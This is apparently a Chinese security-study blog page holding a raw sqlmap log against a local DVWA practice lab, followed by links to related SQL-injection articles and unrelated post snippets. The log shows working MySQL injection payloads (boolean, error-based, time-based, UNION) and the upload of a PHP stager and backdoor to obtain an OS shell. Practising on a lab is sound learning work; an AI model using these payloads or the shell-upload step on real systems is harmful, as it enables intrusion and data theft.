sql回显注入-笔记
_____H_____ ___[']_____ ___ ___ {1.1.4.16#dev}|_ -| . ['] | .'| . ||___|_ [(]_|_|_|__,| _||_|V |_| http://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 09:42:39[09:42:39] [INFO] resuming back-end DBMS 'mysql'[09:42:39] [INFO] testing connection to the target URLsqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET)Type: boolean-based blindTitle: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) (NOT)Payload: id=1' OR NOT 1977=1977#&Submit=SubmitType: error-basedTitle: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' AND (SELECT 3539 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(3539=3539,1))),0x7178767171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- FXCd&Submit=SubmitType: AND/OR time-based blindTitle: MySQL >= 5.0.12 AND time-based blindPayload: id=1' AND SLEEP(5)-- peqj&Submit=SubmitType: UNION queryTitle: MySQL UNION query (NULL) - 2 columnsPayload: id=1' UNION ALL SELECT NULL,CONCAT(0x716a767171,0x50557565536267736d786d6466746d634a4d6b46466d61764e46484d635941774f6a725371596862,0x7178767171)#&Submit=Submit---[09:42:39] [INFO] the back-end DBMS is MySQLweb server operating system: Windowsweb application technology: PHP 5.4.45, Apache 2.4.23back-end DBMS: MySQL >= 5.0[09:42:39] [INFO] going to use a web backdoor for command prompt[09:42:39] [INFO] fingerprinting the back-end DBMS operating system[09:42:39] [INFO] the back-end DBMS operating system is Windowswhich web application language does the web server support?[1] ASP (default)[2] ASPX[3] JSP[4] PHP> 4do you want sqlmap to further try to provoke the full path disclosure? [Y/n] n[09:42:43] [WARNING] unable to automatically retrieve the web server document rootwhat do you want to use for writable directory?[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)[2] custom location(s)[3] custom directory list file[4] brute force search> 2please provide a comma separate list of absolute directory paths: C:\phpStudy\WWW\DVWA[09:42:51] [WARNING] unable to automatically parse any web server path[09:42:51] [INFO] trying to upload the file stager on 'C:/phpStudy/WWW/DVWA/' via LIMIT 'LINES TERMINATED BY' method[09:42:51] [INFO] heuristics detected web page charset 'ascii'[09:42:51] [INFO] the file stager has been successfully uploaded on 'C:/phpStudy/WWW/DVWA/' - http://192.168.3.88:80/DVWA/tmpummkl.php[09:42:52] [INFO] the backdoor has been successfully uploaded on 'C:/phpStudy/WWW/DVWA/' - http://192.168.3.88:80/DVWA/tmpbhbmv.php[09:42:52] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTERos-shell> dirdo you want to retrieve the command standard output? [Y/n/a] y[09:42:56] [INFO] heuristics detected web page charset 'GB2312'command standard output:---驱动器 C 中的卷是 BOOTCAMP卷的序列号是 D89B-813FC:\phpStudy\WWW\DVWA 的目录2017-05-16 09:42 <DIR> .2017-05-16 09:42 <DIR> ..2015-10-05 15:51 500 .htaccess2015-10-05 15:51 3,845 about.php2015-10-05 15:51 7,229 CHANGELOG.md2017-04-25 09:18 <DIR> config2015-10-05 15:51 33,107 COPYING.txt2017-04-25 09:18 <DIR> docs2017-04-25 09:18 <DIR> dvwa2017-04-25 09:18 <DIR> external2015-10-05 15:51 1,406 favicon.ico2017-04-25 09:18 <DIR> hackable2015-10-05 15:51 895 ids_log.php2015-10-05 15:51 4,389 index.php2015-10-05 15:51 1,869 instructions.php2015-10-05 15:51 3,522 login.php2015-10-05 15:51 414 logout.php2015-10-05 15:51 148 php.ini2015-10-05 15:51 199 phpinfo.php2015-10-05 15:51 7,651 README.md2015-10-05 15:51 26 robots.txt2015-10-05 15:51 4,686 security.php2015-10-05 15:51 2,364 setup.php2017-05-04 20:59 466 test.php2017-05-16 09:42 908 tmpbhbmv.php2017-05-16 09:42 727 tmpummkl.php2017-05-15 21:11 29 ttt.php2017-04-25 09:18 <DIR> vulnerabilities20 个文件 74,380 字节8 个目录 18,391,883,776 可用字节---os-shell> x[09:43:02] [INFO] cleaning up the web files uploaded[09:43:02] [WARNING] HTTP error codes detected during run:404 (Not Found) - 2 times[09:43:02] [INFO] fetched data logged to text files under 'C:\Users\zptxwd\.sqlmap\output\192.168.3.88'[*] shutting down at 09:43:03
sql回显注入-笔记的更多相关文章
- DVWA中SQL回显注入
一.SQL注入简介 1.1 SQL语句就是操作数据库的语句,SQL注入就是通过web程序在数据库里执行任意SQL语句. SQL 注入是一种常见的Web安全漏洞,攻击者利用这个漏洞,可以访问和修改数据, ...
- sql回显注入(满满的干货)
三种注入poc where user_id = 1 or 1=1 where user_id = '1' or '1'='1' where user_id =" 1 "or &qu ...
- 捅伊朗黑客PP — 后台登陆POST+错误回显 注入
看了一个泰国政府的网站被伊朗的黑客挂页,上面写着“Your Box 0wn3z By Behrooz_Ice – Q7x -Sha2ow -Virangar -Ali_Eagle -iman_takt ...
- 巧用DNSlog实现无回显注入
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入.具体原理如下 ...
- 巧用DNSlog实现无回显注入【转载】
原作者:afanti 原出处:https://www.cnblogs.com/afanti/p/8047530.html 0x00 简介 测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行 ...
- 利用DNSLog实现无回显注入
测试一些网站的时候,一些注入都是无回显的,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,这样我们可以通过设置ip代理池解决, 但是盲注往往效率很低,所以产生了DNSlog注入 DNSLOG ...
- sql注入笔记-mysql
整理下sql相关知识,查漏补缺(长期更新) 1 常用语句及知识 information_schema包含了大量有用的信息,例如下图 mysql.user下有所有的用户信息,其中authenticati ...
- 2019-9-10:渗透测试,基础学习,sql注入笔记
sql注入1,万能密码,自己写的网站,找到登录窗口,必须和数据库交互,往里插入构造的恶意代码,最后可以直接登录进去,不需要账号和密码,输入的恶意代码成为万能密码,后端拼接的sql语句,SELECT * ...
- SQL反模式学习笔记21 SQL注入
目标:编写SQL动态查询,防止SQL注入 通常所说的“SQL动态查询”是指将程序中的变量和基本SQL语句拼接成一个完整的查询语句. 反模式:将未经验证的输入作为代码执行 当向SQL查询的字符串中插入别 ...
随机推荐
- python 的pip安装
C:\Python27>C:\Python27\Scripts\pip.exe install gevent gevent是安装的模块名
- k8s配置文件模板
一,deployment Deployment为Pod和Replica Set下一代Replication Controller)提供声明式更新 1,配置示例 apiVersion: apps/v1 ...
- 计算机网络(九),HTTP简介
目录 1.超文本传输协议HTTP的主要特点 2.HTTP请求结构 3.HTTP响应结构 4.http请求/响应的步骤 九.HTTP简介 1.超文本传输协议HTTP的主要特点 (1)支持客户/服务器模式 ...
- Tarjan求强连通分量、求桥和割点模板
Tarjan 求强连通分量模板.参考博客 #include<stdio.h> #include<stack> #include<algorithm> using n ...
- 【LOJ2604】「NOIP2012」开车旅行
[题目链接] [点击打开链接] [题目大意] 从西到东的坐标轴\([1,n]\)上有\(n\)个海拔互不相同的城市,每两个城市之间的距离定义为\(dis(i,j)=|h_i-h_j|\) 小\(A\) ...
- BZOJ 5326 [JSOI2017]博弈 (模拟费用流、线段树)
题目链接 https://www.lydsy.com/JudgeOnline/problem.php?id=5326 题解 终于成为第8个A掉这题的人--orz tzw神仙早我6小时 本以为这东西常数 ...
- JS框架_(JQuery.js)模拟刮奖
百度云盘:传送门 密码:6p5q 纯CSS模拟刮奖效果 <!DOCTYPE html> <html lang="en"> <head> < ...
- tp5获取器的用法。
1.命名规则 get + 属性名的驼峰命名+ Attr ------>在相应的model中创建方法 例如: protected function getSexAttr($value ...
- MySQL 数据库 常用函数
一.数学函数 数学函数主要用于处理数字,包括整型.浮点数等. ABS(x) 返回x的绝对值 SELECT ABS(-1) -- 返回1 CEIL(x),CEILING(x) 返回大于或等于x的最小整数 ...
- linux的awk使用
awk统计password文件中,登陆shell为“/sbin/nologin”的用户个数 [root@localhost ~]# cat passwd | grep "/sbin/nolo ...